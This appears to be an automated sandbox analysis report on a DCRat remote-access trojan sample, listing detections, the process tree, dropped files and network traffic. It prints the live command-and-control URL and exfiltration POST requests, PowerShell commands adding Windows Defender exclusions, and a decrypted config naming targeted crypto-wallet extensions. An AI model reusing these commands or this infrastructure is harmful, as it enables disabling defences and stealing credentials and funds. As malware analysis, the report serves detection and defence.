Windows Analysis Report
updIMdPUj8.exe

Overview

General Information

Sample name: updIMdPUj8.exe
renamed because original name is a hash value
Original sample name: bc1fb66921db74a0051917b26a4bd316.exe
Analysis ID: 1583613
MD5: bc1fb66921db74a0051917b26a4bd316
SHA1: fe3667e5c6a3056dac5bae9f2d718466a0b246bc
SHA256: b87707b4ec5d92bfb2e13e04201fe95df291612511a4023001d0ec7fcbf88cb3
Tags: DCRat, exe, user-abuse_ch
Infos:

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Drops PE files with benign system names
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • updIMdPUj8.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\updIMdPUj8.exe" MD5: BC1FB66921DB74A0051917B26A4BD316)
    • wscript.exe (PID: 7368 cmdline: "C:\Windows\System32\WScript.exe" "C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c ""C:\BridgeSavesMonitor\PiJ39TM3MwLHVAF8MIz1L5IKE7LQcw3.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • hypersurrogateComponentdhcp.exe (PID: 7600 cmdline: "C:\BridgeSavesMonitor/hypersurrogateComponentdhcp.exe" MD5: 8A121B557A98B065A7CD2EB30882362D)
          • powershell.exe (PID: 7804 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7812 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 7456 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 7828 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7836 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\ZWgKQlTqcrSB.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7852 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\Accessories\ZWgKQlTqcrSB.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8096 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UV4iXMFwPx.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 5664 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 7000 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • ZWgKQlTqcrSB.exe (PID: 3300 cmdline: "C:\Windows\TAPI\ZWgKQlTqcrSB.exe" MD5: 8A121B557A98B065A7CD2EB30882362D)
  • svchost.exe (PID: 6344 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 url": "http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
updIMdPUj8.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
C:\Recovery\csrss.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000005.00000000.1842993642.0000000000BA2000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000018.00000002.2935880086.0000000003199000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: updIMdPUj8.exe PID: 7324 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
5.0.hypersurrogateComponentdhcp.exe.ba0000.0.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

                          System Summary

                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe, ProcessId: 7600, TargetFilename: C:\Recovery\csrss.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\BridgeSavesMonitor/hypersurrogateComponentdhcp.exe", ParentImage: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe, ParentProcessId: 7600, ParentProcessName: hypersurrogateComponentdhcp.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe', ProcessId: 7804, ProcessName: powershell.exe
                          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\updIMdPUj8.exe", ParentImage: C:\Users\user\Desktop\updIMdPUj8.exe, ParentProcessId: 7324, ParentProcessName: updIMdPUj8.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe" , ProcessId: 7368, ProcessName: wscript.exe
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\BridgeSavesMonitor/hypersurrogateComponentdhcp.exe", ParentImage: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe, ParentProcessId: 7600, ParentProcessName: hypersurrogateComponentdhcp.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe', ProcessId: 7804, ProcessName: powershell.exe
                          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6344, ProcessName: svchost.exe
                          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                          2025-01-03T07:58:07.640288+0100 | 2048130 | 1 | A Network Trojan was detected | 192.168.2.4 | 49764 | 86.110.194.28 | 80 | TCP

                          AV Detection

                          Source: updIMdPUj8.exeAvira: detected
                          Source: C:\Users\user\AppData\Local\Temp\UV4iXMFwPx.batAvira: detection malicious, Label: BAT/Delbat.C
                          Source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                          Source: C:\Recovery\csrss.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Users\user\Desktop\KCawqqLw.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Users\user\Desktop\IwSFjKJP.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: 5.0.hypersurrogateComponentdhcp.exe.ba0000.0.unpackMalware Configuration Extractor: DCRat {"C2 url": "http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeReversingLabs: Detection: 78%
                          Source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exeReversingLabs: Detection: 78%
                          Source: C:\Program Files\Adobe\ZWgKQlTqcrSB.exeReversingLabs: Detection: 78%
                          Source: C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exeReversingLabs: Detection: 78%
                          Source: C:\Recovery\csrss.exeReversingLabs: Detection: 78%
                          Source: C:\Users\user\Desktop\GQyPcgoW.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\GUTYNdlI.logReversingLabs: Detection: 15%
                          Source: C:\Users\user\Desktop\IECYOtkU.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\KCawqqLw.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\MJbpFLtL.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\NKXFMJFr.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\OxfxrZpJ.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\PybNxWBp.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\QvCVTWQk.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\TkxwTWEx.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\XXPuwSTl.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\XpVNKoNn.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\cXlUovHQ.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\dBJtpdQc.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\eRokfvkG.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\gSeCuhdU.logReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\kJRJIbpu.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\kOfTBNTO.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\kSAcnKQA.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\oROSeukq.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\tahrXlpt.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\xAiiOWpY.logReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\yViIeRfn.logReversingLabs: Detection: 15%
                          Source: C:\Users\user\Desktop\zgCYVAKQ.logReversingLabs: Detection: 50%
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeReversingLabs: Detection: 78%
                          Source: updIMdPUj8.exeVirustotal: Detection: 58%
                          Source: updIMdPUj8.exeReversingLabs: Detection: 68%
                          Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
                          Source: C:\Users\user\Desktop\EOLhHxkb.logJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\DWtPcxKJ.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\ATGgGOGO.logJoe Sandbox ML: detected
                          Source: C:\Recovery\csrss.exeJoe Sandbox ML: detected
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\IwSFjKJP.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\GUTYNdlI.logJoe Sandbox ML: detected
                          Source: updIMdPUj8.exeJoe Sandbox ML: detected
                          Source: 00000005.00000000.1842993642.0000000000BA2000.00000002.00000001.01000000.0000000A.sdmpString decryptor: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"Current User","_3":"True"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;example.com;any.domain.net","_1":"mail.google.com;example.com;any.domain.net"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"","_1":"Full path"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"15000000","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
                          Source: 00000005.00000000.1842993642.0000000000BA2000.00000002.00000001.01000000.0000000A.sdmpString decryptor: ["iautCuDPhtVJ2cfkZIsFPp5GJi3lfWEBRXyzdcyyMXeAB5LEz6zm44w3fnjd0btKpU2fopG6U421K4FOWzwjgcHWk4Uz2U7vnUVqDpaJz3R9C4skiVHBpKnMNf5tVQD9","8f8e651a25a945ecc390a45c0da3cfc0265e5ce1aa467481e904db157d1d950e","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJeElpd2lJaXdpWlhsSmQwbHFiMmxsTVU1YVZURlNSbFJWVWxOVFZscEdabE01Vm1NeVZubGplVGhwVEVOSmVFbHFiMmxrU0VveFdsTkpjMGxxU1dsUGFVb3dZMjVXYkVscGQybE5lVWsyU1c1U2VXUlhWV2xNUTBrd1NXcHZhV1JJU2pGYVUwbHpTV3BWYVU5cFNqQmpibFpzU1dsM2FVNXBTVFpKYmxKNVpGZFZhVXhEU1ROSmFtOXBaRWhLTVZwVFNYTkphbWRwVDJsS01HTnVWbXhKYVhkcFQxTkpOa2x1VW5sa1YxVnBURU5KZUUxRFNUWkpibEo1WkZkVmFVeERTWGhOVTBrMlNXNVNlV1JYVldsTVEwbDRUV2xKTmtsdVVubGtWMVZwVEVOSmVFMTVTVFpKYmxKNVpGZFZhVXhEU1hoT1EwazJTVzVTZVdSWFZXbG1VVDA5SWwwPSJd"]
                          Source: 00000005.00000000.1842993642.0000000000BA2000.00000002.00000001.01000000.0000000A.sdmpString decryptor: [["http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/","processorWindowsDatalifepublic"]]
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 24_2_00007FFD9C10367E CryptUnprotectData,24_2_00007FFD9C10367E
                          Source: updIMdPUj8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Directory created: C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exe
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Directory created: C:\Program Files\Windows Multimedia Platform\b2c372d662fd88
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Directory created: C:\Program Files\Adobe\ZWgKQlTqcrSB.exe
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Directory created: C:\Program Files\Adobe\b2c372d662fd88
                          Source: updIMdPUj8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: updIMdPUj8.exe
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B2A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00B2A69B
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00B3C220
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe File opened: C:\Users\user
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe File opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe File opened: C:\Users\user\AppData
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe File opened: C:\Users\user\AppData\Local\Temp
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe File opened: C:\Users\user\Desktop\desktop.ini
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe File opened: C:\Users\user\AppData\Local

                          Software Vulnerabilities

                          Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 4x nop then jmp 00007FFD9B9EDFC6h5_2_00007FFD9B9EDDAD
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 4x nop then jmp 00007FFD9B9FDFC6h24_2_00007FFD9B9FDE01
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 4x nop then jmp 00007FFD9BFCC99Bh24_2_00007FFD9BFCC688
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 4x nop then jmp 00007FFD9C102B29h24_2_00007FFD9C102869
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 4x nop then jmp 00007FFD9C102B29h24_2_00007FFD9C102A38
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 4x nop then jmp 00007FFD9C102B29h24_2_00007FFD9C102A28

                          Networking

                          Source: Network trafficSuricata IDS: 2048130 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) : 192.168.2.4:49764 -> 86.110.194.28:80
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: Joe Sandbox ViewASN Name: RACKTECHRU RACKTECHRU
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 1384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2000Expect: 100-continueConnection: Keep-Alive
                          Source: global traffic HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 86.110.194.28 Content-Length: 2512 Expect: 100-continue
                          Source: global traffic HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----w7zdkfYFEzY2KpKGQqqzrcAd64jvRvQWOr User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 86.110.194.28 Content-Length: 169482 Expect: 100-continue
                          Source: global traffic HTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 86.110.194.28 Content-Length: 2108 Expect: 100-continue Connection: Keep-Alive
